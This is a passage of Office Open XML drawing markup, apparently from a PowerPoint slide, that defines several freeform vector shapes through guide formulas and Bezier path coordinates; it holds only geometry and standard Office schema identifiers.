                <a:gd name="T16" fmla="*/ 121 w 242"/>
                <a:gd name="T17" fmla="*/ 179 h 305"/>
                <a:gd name="T18" fmla="*/ 66 w 242"/>
                <a:gd name="T19" fmla="*/ 9 h 305"/>
                <a:gd name="T20" fmla="*/ 44 w 242"/>
                <a:gd name="T21" fmla="*/ 0 h 305"/>
                <a:gd name="T22" fmla="*/ 16 w 242"/>
                <a:gd name="T23" fmla="*/ 0 h 305"/>
                <a:gd name="T24" fmla="*/ 0 w 242"/>
                <a:gd name="T25" fmla="*/ 11 h 305"/>
                <a:gd name="T26" fmla="*/ 28 w 242"/>
                <a:gd name="T27" fmla="*/ 21 h 305"/>
                <a:gd name="T28" fmla="*/ 28 w 242"/>
                <a:gd name="T29" fmla="*/ 284 h 305"/>
                <a:gd name="T30" fmla="*/ 0 w 242"/>
                <a:gd name="T31" fmla="*/ 295 h 305"/>
                <a:gd name="T32" fmla="*/ 16 w 242"/>
                <a:gd name="T33" fmla="*/ 305 h 305"/>
                <a:gd name="T34" fmla="*/ 58 w 242"/>
                <a:gd name="T35" fmla="*/ 305 h 305"/>
                <a:gd name="T36" fmla="*/ 73 w 242"/>
                <a:gd name="T37" fmla="*/ 295 h 305"/>
                <a:gd name="T38" fmla="*/ 46 w 242"/>
                <a:gd name="T39" fmla="*/ 284 h 305"/>
                <a:gd name="T40" fmla="*/ 46 w 242"/>
                <a:gd name="T41" fmla="*/ 21 h 305"/>
                <a:gd name="T42" fmla="*/ 50 w 242"/>
                <a:gd name="T43" fmla="*/ 21 h 305"/>
                <a:gd name="T44" fmla="*/ 106 w 242"/>
                <a:gd name="T45" fmla="*/ 193 h 305"/>
                <a:gd name="T46" fmla="*/ 121 w 242"/>
                <a:gd name="T47" fmla="*/ 200 h 305"/>
                <a:gd name="T48" fmla="*/ 138 w 242"/>
                <a:gd name="T49" fmla="*/ 191 h 305"/>
                <a:gd name="T50" fmla="*/ 193 w 242"/>
                <a:gd name="T51" fmla="*/ 21 h 305"/>
                <a:gd name="T52" fmla="*/ 197 w 242"/>
                <a:gd name="T53" fmla="*/ 21 h 305"/>
                <a:gd name="T54" fmla="*/ 197 w 242"/>
                <a:gd name="T55" fmla="*/ 284 h 305"/>
                <a:gd name="T56" fmla="*/ 169 w 242"/>
                <a:gd name="T57" fmla="*/ 295 h 305"/>
                <a:gd name="T58" fmla="*/ 185 w 242"/>
                <a:gd name="T59" fmla="*/ 305 h 305"/>
                <a:gd name="T60" fmla="*/ 227 w 242"/>
                <a:gd name="T61" fmla="*/ 305 h 305"/>
                <a:gd name="T62" fmla="*/ 242 w 242"/>
                <a:gd name="T63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2" h="305">
                  <a:moveTo>
                    <a:pt x="242" y="295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="284"/>
                    <a:pt x="233" y="284"/>
                    <a:pt x="215" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="21"/>
                    <a:pt x="242" y="21"/>
                    <a:pt x="242" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="0"/>
                    <a:pt x="232" y="0"/>
                    <a:pt x="227" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="0"/>
                    <a:pt x="177" y="6"/>
                    <a:pt x="174" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="9"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="50" y="0"/>
                    <a:pt x="4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28" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28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58" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="305"/>
                    <a:pt x="73" y="305"/>
                    <a:pt x="73" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="284"/>
                    <a:pt x="64" y="284"/>
                    <a:pt x="46" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="193"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="199"/>
                    <a:pt x="117" y="200"/>
                    <a:pt x="121" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="200"/>
                    <a:pt x="136" y="198"/>
                    <a:pt x="138" y="191"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="193" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="284"/>
                    <a:pt x="169" y="284"/>
                    <a:pt x="169" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="305"/>
                    <a:pt x="179" y="305"/>
                    <a:pt x="185" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="227" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="305"/>
                    <a:pt x="242" y="305"/>
                    <a:pt x="242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2" name="Freeform 1078">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1196DB43-D28E-41BA-8084-D71B0A4AA8F2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2205037" y="846138"/>
              <a:ext cx="77788" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 200 w 200"/>
                <a:gd name="T1" fmla="*/ 265 h 391"/>
                <a:gd name="T2" fmla="*/ 111 w 200"/>
                <a:gd name="T3" fmla="*/ 179 h 391"/>
                <a:gd name="T4" fmla="*/ 111 w 200"/>
                <a:gd name="T5" fmla="*/ 62 h 391"/>
                <a:gd name="T6" fmla="*/ 173 w 200"/>
                <a:gd name="T7" fmla="*/ 105 h 391"/>
                <a:gd name="T8" fmla="*/ 164 w 200"/>
                <a:gd name="T9" fmla="*/ 120 h 391"/>
                <a:gd name="T10" fmla="*/ 182 w 200"/>
                <a:gd name="T11" fmla="*/ 138 h 391"/>
                <a:gd name="T12" fmla="*/ 200 w 200"/>
                <a:gd name="T13" fmla="*/ 118 h 391"/>
                <a:gd name="T14" fmla="*/ 111 w 200"/>
                <a:gd name="T15" fmla="*/ 40 h 391"/>
                <a:gd name="T16" fmla="*/ 111 w 200"/>
                <a:gd name="T17" fmla="*/ 16 h 391"/>
                <a:gd name="T18" fmla="*/ 100 w 200"/>
                <a:gd name="T19" fmla="*/ 0 h 391"/>
                <a:gd name="T20" fmla="*/ 89 w 200"/>
                <a:gd name="T21" fmla="*/ 16 h 391"/>
                <a:gd name="T22" fmla="*/ 89 w 200"/>
                <a:gd name="T23" fmla="*/ 41 h 391"/>
                <a:gd name="T24" fmla="*/ 0 w 200"/>
                <a:gd name="T25" fmla="*/ 120 h 391"/>
                <a:gd name="T26" fmla="*/ 89 w 200"/>
                <a:gd name="T27" fmla="*/ 200 h 391"/>
                <a:gd name="T28" fmla="*/ 89 w 200"/>
                <a:gd name="T29" fmla="*/ 330 h 391"/>
                <a:gd name="T30" fmla="*/ 26 w 200"/>
                <a:gd name="T31" fmla="*/ 281 h 391"/>
                <a:gd name="T32" fmla="*/ 35 w 200"/>
                <a:gd name="T33" fmla="*/ 265 h 391"/>
                <a:gd name="T34" fmla="*/ 18 w 200"/>
                <a:gd name="T35" fmla="*/ 247 h 391"/>
                <a:gd name="T36" fmla="*/ 0 w 200"/>
                <a:gd name="T37" fmla="*/ 268 h 391"/>
                <a:gd name="T38" fmla="*/ 89 w 200"/>
                <a:gd name="T39" fmla="*/ 351 h 391"/>
                <a:gd name="T40" fmla="*/ 89 w 200"/>
                <a:gd name="T41" fmla="*/ 375 h 391"/>
                <a:gd name="T42" fmla="*/ 100 w 200"/>
                <a:gd name="T43" fmla="*/ 391 h 391"/>
                <a:gd name="T44" fmla="*/ 111 w 200"/>
                <a:gd name="T45" fmla="*/ 375 h 391"/>
                <a:gd name="T46" fmla="*/ 111 w 200"/>
                <a:gd name="T47" fmla="*/ 351 h 391"/>
                <a:gd name="T48" fmla="*/ 200 w 200"/>
                <a:gd name="T49" fmla="*/ 265 h 391"/>
                <a:gd name="T50" fmla="*/ 89 w 200"/>
                <a:gd name="T51" fmla="*/ 174 h 391"/>
                <a:gd name="T52" fmla="*/ 22 w 200"/>
                <a:gd name="T53" fmla="*/ 118 h 391"/>
                <a:gd name="T54" fmla="*/ 89 w 200"/>
                <a:gd name="T55" fmla="*/ 61 h 391"/>
                <a:gd name="T56" fmla="*/ 89 w 200"/>
                <a:gd name="T57" fmla="*/ 174 h 391"/>
                <a:gd name="T58" fmla="*/ 177 w 200"/>
                <a:gd name="T59" fmla="*/ 267 h 391"/>
                <a:gd name="T60" fmla="*/ 111 w 200"/>
                <a:gd name="T61" fmla="*/ 330 h 391"/>
                <a:gd name="T62" fmla="*/ 111 w 200"/>
                <a:gd name="T63" fmla="*/ 204 h 391"/>
                <a:gd name="T64" fmla="*/ 177 w 200"/>
                <a:gd name="T65" fmla="*/ 2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1">
                  <a:moveTo>
                    <a:pt x="200" y="265"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="241"/>
                    <a:pt x="186" y="193"/>
                    <a:pt x="111" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="65"/>
                    <a:pt x="163" y="73"/>
                    <a:pt x="173" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="110"/>
                    <a:pt x="164" y="115"/>
                    <a:pt x="164" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="129"/>
                    <a:pt x="171" y="138"/>
                    <a:pt x="182" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="138"/>
                    <a:pt x="200" y="133"/>
                    <a:pt x="200" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="80"/>
                    <a:pt x="173" y="46"/>
                    <a:pt x="111" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="10"/>
                    <a:pt x="111" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="0"/>
                    <a:pt x="89" y="10"/>
                    <a:pt x="89" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="47"/>
                    <a:pt x="0" y="84"/>
                    <a:pt x="0" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="132"/>
                    <a:pt x="3" y="184"/>
                    <a:pt x="89" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="330"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="326"/>
                    <a:pt x="35" y="313"/>
                    <a:pt x="26" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="277"/>
                    <a:pt x="35" y="274"/>
                    <a:pt x="35" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="254"/>
                    <a:pt x="26" y="247"/>
                    <a:pt x="18" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="247"/>
                    <a:pt x="0" y="249"/>
                    <a:pt x="0" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="308"/>
                    <a:pt x="28" y="345"/>
                    <a:pt x="89" y="351"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="375"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="381"/>
                    <a:pt x="89" y="391"/>
                    <a:pt x="100" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="391"/>
                    <a:pt x="111" y="381"/>
                    <a:pt x="111" y="375"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="351"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="341"/>
                    <a:pt x="200" y="299"/>
                    <a:pt x="200" y="265"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="89" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="167"/>
                    <a:pt x="22" y="147"/>
                    <a:pt x="22" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="91"/>
                    <a:pt x="49" y="68"/>
                    <a:pt x="89" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="177" y="267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="296"/>
                    <a:pt x="152" y="322"/>
                    <a:pt x="111" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="204"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="213"/>
                    <a:pt x="177" y="239"/>
                    <a:pt x="177" y="26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3" name="Freeform 1079">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC0E9C9E-098D-4EC3-9D71-CEB3A4DCB569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398712" y="898525"/>
              <a:ext cx="90488" cy="84138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 236 w 236"/>
                <a:gd name="T1" fmla="*/ 11 h 214"/>
                <a:gd name="T2" fmla="*/ 220 w 236"/>
                <a:gd name="T3" fmla="*/ 0 h 214"/>
                <a:gd name="T4" fmla="*/ 160 w 236"/>
                <a:gd name="T5" fmla="*/ 0 h 214"/>
                <a:gd name="T6" fmla="*/ 144 w 236"/>
                <a:gd name="T7" fmla="*/ 11 h 214"/>
                <a:gd name="T8" fmla="*/ 160 w 236"/>
                <a:gd name="T9" fmla="*/ 21 h 214"/>
                <a:gd name="T10" fmla="*/ 181 w 236"/>
                <a:gd name="T11" fmla="*/ 21 h 214"/>
                <a:gd name="T12" fmla="*/ 123 w 236"/>
                <a:gd name="T13" fmla="*/ 193 h 214"/>
                <a:gd name="T14" fmla="*/ 113 w 236"/>
                <a:gd name="T15" fmla="*/ 193 h 214"/>
                <a:gd name="T16" fmla="*/ 55 w 236"/>
                <a:gd name="T17" fmla="*/ 21 h 214"/>
                <a:gd name="T18" fmla="*/ 76 w 236"/>
                <a:gd name="T19" fmla="*/ 21 h 214"/>
                <a:gd name="T20" fmla="*/ 91 w 236"/>
                <a:gd name="T21" fmla="*/ 11 h 214"/>
                <a:gd name="T22" fmla="*/ 76 w 236"/>
                <a:gd name="T23" fmla="*/ 0 h 214"/>
                <a:gd name="T24" fmla="*/ 16 w 236"/>
                <a:gd name="T25" fmla="*/ 0 h 214"/>
                <a:gd name="T26" fmla="*/ 0 w 236"/>
                <a:gd name="T27" fmla="*/ 11 h 214"/>
                <a:gd name="T28" fmla="*/ 16 w 236"/>
                <a:gd name="T29" fmla="*/ 21 h 214"/>
                <a:gd name="T30" fmla="*/ 34 w 236"/>
                <a:gd name="T31" fmla="*/ 21 h 214"/>
                <a:gd name="T32" fmla="*/ 94 w 236"/>
                <a:gd name="T33" fmla="*/ 200 h 214"/>
                <a:gd name="T34" fmla="*/ 118 w 236"/>
                <a:gd name="T35" fmla="*/ 214 h 214"/>
                <a:gd name="T36" fmla="*/ 141 w 236"/>
                <a:gd name="T37" fmla="*/ 201 h 214"/>
                <a:gd name="T38" fmla="*/ 202 w 236"/>
                <a:gd name="T39" fmla="*/ 21 h 214"/>
                <a:gd name="T40" fmla="*/ 220 w 236"/>
                <a:gd name="T41" fmla="*/ 21 h 214"/>
                <a:gd name="T42" fmla="*/ 236 w 236"/>
                <a:gd name="T43" fmla="*/ 1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214">
                  <a:moveTo>
                    <a:pt x="236" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="0"/>
                    <a:pt x="226" y="0"/>
                    <a:pt x="220" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="144" y="0"/>
                    <a:pt x="144" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="21"/>
                    <a:pt x="154" y="21"/>
                    <a:pt x="160" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="181" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="21"/>
                    <a:pt x="91" y="21"/>
                    <a:pt x="91" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="82" y="0"/>
                    <a:pt x="76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4" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="214"/>
                    <a:pt x="109" y="214"/>
                    <a:pt x="118" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="214"/>
                    <a:pt x="137" y="214"/>
                    <a:pt x="141" y="201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="21"/>
                    <a:pt x="236" y="21"/>
                    <a:pt x="236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4" name="Freeform 1080">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C04CB43-215B-46EA-BAD2-D7C1AD678B24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497137" y="898525"/>
              <a:ext cx="93663" cy="84138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8 w 247"/>
                <a:gd name="T23" fmla="*/ 155 h 215"/>
                <a:gd name="T24" fmla="*/ 68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8" y="194"/>
                    <a:pt x="68" y="174"/>
                    <a:pt x="68" y="155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6" y="215"/>
                    <a:pt x="111" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="215"/>
                    <a:pt x="152" y="210"/>
                    <a:pt x="178" y="191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5" name="Freeform 1081">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66BCB332-BC96-42C6-AFE4-2A98919796AC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605087" y="862013"/>
              <a:ext cx="77788" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 201"/>
                <a:gd name="T1" fmla="*/ 295 h 305"/>
                <a:gd name="T2" fmla="*/ 185 w 201"/>
                <a:gd name="T3" fmla="*/ 284 h 305"/>
                <a:gd name="T4" fmla="*/ 113 w 201"/>
                <a:gd name="T5" fmla="*/ 284 h 305"/>
                <a:gd name="T6" fmla="*/ 113 w 201"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 97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5 w 201"/>
                <a:gd name="T15" fmla="*/ 21 h 305"/>
                <a:gd name="T16" fmla="*/ 87 w 201"/>
                <a:gd name="T17" fmla="*/ 21 h 305"/>
                <a:gd name="T18" fmla="*/ 87 w 201"/>
                <a:gd name="T19" fmla="*/ 284 h 305"/>
                <a:gd name="T20" fmla="*/ 16 w 201"/>
                <a:gd name="T21" fmla="*/ 284 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 201"/>
                <a:gd name="T23" fmla="*/ 295 h 305"/>
                <a:gd name="T24" fmla="*/ 15 w 201"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 185 w 201"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 201 w 201"/>
                <a:gd name="T29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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="284"/>
                    <a:pt x="191" y="284"/>
                    <a:pt x="185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0" y="0"/>
                    <a:pt x="97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87" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87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0" y="305"/>
                    <a:pt x="15" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="185" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="305"/>
                    <a:pt x="201" y="305"/>
                    <a:pt x="20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6" name="Freeform 1082">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76897BD1-1366-4211-9CD6-C8124011BB2A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2809875" y="876300"/>
              <a:ext cx="117475" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 304 w 304"/>
                <a:gd name="T1" fmla="*/ 279 h 289"/>
                <a:gd name="T2" fmla="*/ 295 w 304"/>
                <a:gd name="T3" fmla="*/ 268 h 289"/>
                <a:gd name="T4" fmla="*/ 33 w 304"/>
                <a:gd name="T5" fmla="*/ 144 h 289"/>
                <a:gd name="T6" fmla="*/ 295 w 304"/>
                <a:gd name="T7" fmla="*/ 21 h 289"/>
                <a:gd name="T8" fmla="*/ 304 w 304"/>
                <a:gd name="T9" fmla="*/ 10 h 289"/>
                <a:gd name="T10" fmla="*/ 294 w 304"/>
                <a:gd name="T11" fmla="*/ 0 h 289"/>
                <a:gd name="T12" fmla="*/ 285 w 304"/>
                <a:gd name="T13" fmla="*/ 3 h 289"/>
                <a:gd name="T14" fmla="*/ 9 w 304"/>
                <a:gd name="T15" fmla="*/ 133 h 289"/>
                <a:gd name="T16" fmla="*/ 0 w 304"/>
                <a:gd name="T17" fmla="*/ 144 h 289"/>
                <a:gd name="T18" fmla="*/ 9 w 304"/>
                <a:gd name="T19" fmla="*/ 155 h 289"/>
                <a:gd name="T20" fmla="*/ 285 w 304"/>
                <a:gd name="T21" fmla="*/ 285 h 289"/>
                <a:gd name="T22" fmla="*/ 294 w 304"/>
                <a:gd name="T23" fmla="*/ 289 h 289"/>
                <a:gd name="T24" fmla="*/ 304 w 304"/>
                <a:gd name="T25" fmla="*/ 27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289">
                  <a:moveTo>
                    <a:pt x="304" y="279"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="274"/>
                    <a:pt x="301" y="271"/>
                    <a:pt x="295" y="268"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="18"/>
                    <a:pt x="304" y="15"/>
                    <a:pt x="304" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="4"/>
                    <a:pt x="300" y="0"/>
                    <a:pt x="294" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="0"/>
                    <a:pt x="292" y="0"/>
                    <a:pt x="285" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9" y="133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="136"/>
                    <a:pt x="0" y="138"/>
                    <a:pt x="0" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="150"/>
                    <a:pt x="4" y="153"/>
                    <a:pt x="9" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="285" y="285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="289"/>
                    <a:pt x="293" y="289"/>
                    <a:pt x="294" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="289"/>
                    <a:pt x="304" y="284"/>
                    <a:pt x="304" y="2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7" name="Freeform 1083">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86F5D2B-E578-4515-B92E-222E8C577E32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3057525" y="863600"/>
              <a:ext cx="71438" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 184"/>
                <a:gd name="T1" fmla="*/ 292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1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2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2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2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5" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="111"/>
                    <a:pt x="15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2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2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0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8" name="Freeform 1084">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E30C1CD-9F69-4939-A7D8-F190C8B7C49A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144837" y="896938"/>
              <a:ext cx="95250" cy="84138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5 h 215"/>
                <a:gd name="T34" fmla="*/ 96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7"/>
                    <a:pt x="69" y="34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5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9" name="Freeform 1085">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0623C1A-4170-44F0-B4F9-7319C66B06F1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3244850" y="896938"/>
              <a:ext cx="90488" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 109 h 330"/>
                <a:gd name="T2" fmla="*/ 140 w 235"/>
                <a:gd name="T3" fmla="*/ 0 h 330"/>
                <a:gd name="T4" fmla="*/ 69 w 235"/>
                <a:gd name="T5" fmla="*/ 32 h 330"/>
                <a:gd name="T6" fmla="*/ 54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6 w 235"/>
                <a:gd name="T13" fmla="*/ 24 h 330"/>
                <a:gd name="T14" fmla="*/ 44 w 235"/>
                <a:gd name="T15" fmla="*/ 24 h 330"/>
                <a:gd name="T16" fmla="*/ 44 w 235"/>
                <a:gd name="T17" fmla="*/ 308 h 330"/>
                <a:gd name="T18" fmla="*/ 16 w 235"/>
                <a:gd name="T19" fmla="*/ 308 h 330"/>
                <a:gd name="T20" fmla="*/ 0 w 235"/>
                <a:gd name="T21" fmla="*/ 319 h 330"/>
                <a:gd name="T22" fmla="*/ 16 w 235"/>
                <a:gd name="T23" fmla="*/ 330 h 330"/>
                <a:gd name="T24" fmla="*/ 97 w 235"/>
                <a:gd name="T25" fmla="*/ 330 h 330"/>
                <a:gd name="T26" fmla="*/ 113 w 235"/>
                <a:gd name="T27" fmla="*/ 319 h 330"/>
                <a:gd name="T28" fmla="*/ 97 w 235"/>
                <a:gd name="T29" fmla="*/ 308 h 330"/>
                <a:gd name="T30" fmla="*/ 69 w 235"/>
                <a:gd name="T31" fmla="*/ 308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7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8"/>
                    <a:pt x="192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30"/>
                    <a:pt x="10" y="330"/>
                    <a:pt x="16" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="330"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="330"/>
                    <a:pt x="113" y="330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4"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="134" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188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8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0" name="Freeform 1086">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B7CF0D-B7DE-4298-8B29-5581C338B641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346450" y="898525"/>
              <a:ext cx="93663" cy="84138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1" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="215"/>
                    <a:pt x="152" y="210"/>
                    <a:pt x="178" y="191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1" name="Freeform 1087">
              <a:extLst>
